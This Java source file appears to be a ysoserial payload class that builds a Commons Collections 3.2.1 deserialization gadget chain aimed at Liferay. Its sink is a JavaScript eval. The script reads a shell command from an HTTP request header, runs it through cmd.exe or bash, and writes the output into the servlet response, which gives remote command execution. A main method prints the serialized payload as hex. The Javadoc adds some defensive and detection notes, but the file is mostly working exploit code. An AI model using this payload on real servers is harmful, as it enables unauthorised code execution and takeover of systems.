package ysoserial.payloads;

import com.mchange.lang.ByteUtils;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.PayloadRunner;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.io.PrintStream;
import java.io.Serializable;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;

/**
 * ysoserial payload: a CommonsCollections6-style gadget chain whose sink is the JDK
 * JavaScript engine ({@code ScriptEngineManager.getEngineByName("JavaScript").eval(...)})
 * rather than {@code Runtime.exec}.
 *
 * <p>Chain as built below: {@code HashSet} -> {@code HashMap} (key re-hashed during
 * {@code readObject}) -> {@code TiedMapEntry.hashCode()} -> {@code LazyMap.get()} ->
 * {@code ChainedTransformer} -> {@code InvokerTransformer("eval")}. The evaluated script
 * (see {@code dropper}) reads a command from an HTTP request header and executes it via
 * {@code cmd.exe /c} or {@code bash -c}, streaming the output back into the response.
 *
 * <p>Defensive notes:
 * <ul>
 *   <li>Requires {@code commons-collections:3.2.1} on the target classpath (see
 *       {@code @Dependencies}); 3.2.2+ refuses to deserialize {@code InvokerTransformer}
 *       by default, and a JEP 290 {@code ObjectInputFilter} allowlist blocks the
 *       {@code org.apache.commons.collections.functors.*} classes up front.</li>
 *   <li>Observable at runtime as {@code ObjectInputStream.readObject} reaching
 *       {@code javax.script} / {@code ProcessBuilder.start} in a stack trace, and as the
 *       application server spawning {@code cmd.exe} or {@code bash} children.</li>
 *   <li>The serialized form emitted by {@link #main} (hex dump) is the artifact a
 *       detection rule would match on; the script text is embedded in it in clear.</li>
 * </ul>
 */
@Dependencies({"commons-collections:commons-collections:3.2.1"})
@Authors({Authors.MATTHIASKAISER, Authors.JANG})
public class LiferayJsonEvalCC6 extends PayloadRunner implements ObjectPayload {

    /**
     * Builds the serializable gadget object.
     *
     * @param command name of the HTTP request header the generated script reads the
     *                command string from (it is spliced into the script verbatim — a
     *                {@code "} or newline in it breaks the script; unescaped by design
     *                of the original author, left as is)
     * @return a {@code HashSet} whose single stored key has been swapped, via reflection,
     *         for a {@code TiedMapEntry} that fires the transformer chain on re-hash
     * @throws Exception any reflective access failure (field names differ per JDK/ART)
     */
    public Serializable getObject(String command) throws Exception {
        // Script run by the JDK's JavaScript engine inside the deserializing JVM.
        // It pulls the real Catalina request out of Liferay's ServiceContext, reads the
        // header named by `command`, runs it through a shell and writes stdout+stderr
        // (redirectErrorStream) to the servlet response as UTF-8.
        String dropper = "var currentThread = com.liferay.portal.service.ServiceContextThreadLocal.getServiceContext();\n"
                + "var isWin = java.lang.System.getProperty(\"os.name\").toLowerCase().contains(\"win\");\n"
                + "var request = currentThread.getRequest();\n"
                + "var _req = org.apache.catalina.connector.RequestFacade.class.getDeclaredField(\"request\");\n"
                + "_req.setAccessible(true);\n"
                + "var realRequest = _req.get(request);\n"
                + "var response = realRequest.getResponse();\n"
                + "var outputStream = response.getOutputStream();\n"
                + "var cmd = new java.lang.String(request.getHeader(\"" + command + "\"));\n"
                + "var listCmd = new java.util.ArrayList();\n" // unused in the script
                + "var p = new java.lang.ProcessBuilder();\n"
                + "if(isWin){\n"
                + " p.command(\"cmd.exe\", \"/c\", cmd);\n"
                + "}else{\n"
                + " p.command(\"bash\", \"-c\", cmd);\n"
                + "}\n"
                + "p.redirectErrorStream(true);\n"
                + "var process = p.start();\n"
                + "var inputStreamReader = new java.io.InputStreamReader(process.getInputStream());\n"
                + "var bufferedReader = new java.io.BufferedReader(inputStreamReader);\n"
                + "var line = \"\";\n"
                + "var fullText = \"\";\n"
                + "while((line = bufferedReader.readLine()) != null){\n"
                + " fullText = fullText + line + \"\\n\";\n"
                + "}\n"
                + "var bytes = fullText.getBytes(\"UTF-8\");\n"
                + "outputStream.write(bytes);\n"
                + "outputStream.close();\n";
        String[] execArgs = new String[]{dropper};

        // Transformer chain: ScriptEngineManager.class -> newInstance() ->
        // getEngineByName("JavaScript") -> eval(dropper) -> constant 1 (the trailing
        // ConstantTransformer hides the eval result from the LazyMap value).
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(javax.script.ScriptEngineManager.class),
                new InvokerTransformer("newInstance", new Class[]{}, new Object[]{}),
                new InvokerTransformer("getEngineByName", new Class[]{String.class}, new Object[]{"JavaScript"}),
                new InvokerTransformer("eval", new Class[]{String.class}, execArgs),
                new ConstantTransformer(1)};
        Transformer transformerChain = new ChainedTransformer(transformers);

        // LazyMap runs the chain on a miss; TiedMapEntry.hashCode() performs that get().
        Map innerMap = new HashMap();
        Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

        // A HashSet holding the harmless key "foo" is serialized; the key is swapped for
        // `entry` after insertion so the chain never fires in the generating JVM.
        HashSet map = new HashSet(1);
        map.add("foo");

        // HashSet's backing map: "map" on OpenJDK; "backingMap" presumably for another
        // runtime's collections (Android/ART?) — not verifiable from here.
        Field f = null;
        try {
            f = HashSet.class.getDeclaredField("map");
        } catch (NoSuchFieldException var18) {
            f = HashSet.class.getDeclaredField("backingMap");
        }
        f.setAccessible(true);
        HashMap innimpl = (HashMap) f.get(map);

        // HashMap's bucket array: "table" on OpenJDK, "elementData" as the fallback.
        Field f2 = null;
        try {
            f2 = HashMap.class.getDeclaredField("table");
        } catch (NoSuchFieldException var17) {
            f2 = HashMap.class.getDeclaredField("elementData");
        }
        f2.setAccessible(true);
        Object[] array = (Object[]) ((Object[]) f2.get(innimpl));

        // Single-element set: the node for "foo" is in bucket 0 or 1 depending on the
        // capacity rounding of `new HashSet(1)`.
        Object node = array[0];
        if (node == null) {
            node = array[1];
        }

        // Node.key on OpenJDK; java.util.MapEntry as the fallback type. The broad
        // catch (Exception) here also masks unrelated reflection errors — a reviewer
        // would narrow it to NoSuchFieldException.
        Field keyField = null;
        try {
            keyField = node.getClass().getDeclaredField("key");
        } catch (Exception var16) {
            keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
        }
        keyField.setAccessible(true);
        keyField.set(node, entry);
        return map;
    }

    /**
     * Generates the payload with header name {@code "cmd2"}, serializes it and prints the
     * bytes as a hex string via the c3p0 {@code ByteUtils} helper (a third-party import
     * used only here; {@code java.util.HexFormat} would do on Java 17+).
     *
     * <p>Note: {@code out} is an unused local, and {@code payload} is a second instance
     * created with the deprecated {@code Class.newInstance()} solely so it can be handed
     * to {@code releasePayload}; {@code cc6Eval} is the instance that actually builds the
     * object.
     *
     * @param args ignored (the {@code PayloadRunner.run} invocation is commented out)
     * @throws Exception propagated from {@link #getObject(String)} and serialization
     */
    public static void main(String[] args) throws Exception {
        PrintStream out = System.out;
        LiferayJsonEvalCC6 cc6Eval = new LiferayJsonEvalCC6();
        ObjectPayload payload = LiferayJsonEvalCC6.class.newInstance();
        Object object = cc6Eval.getObject("cmd2");
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objOut = new ObjectOutputStream(byteArrayOutputStream);
        objOut.writeObject(object);
        String hexDmp = ByteUtils.toHexAscii(byteArrayOutputStream.toByteArray());
        System.out.println(hexDmp);
        ObjectPayload.Utils.releasePayload(payload, object);
        // PayloadRunner.run(LiferayJsonEvalCC6.class, args);
    }
}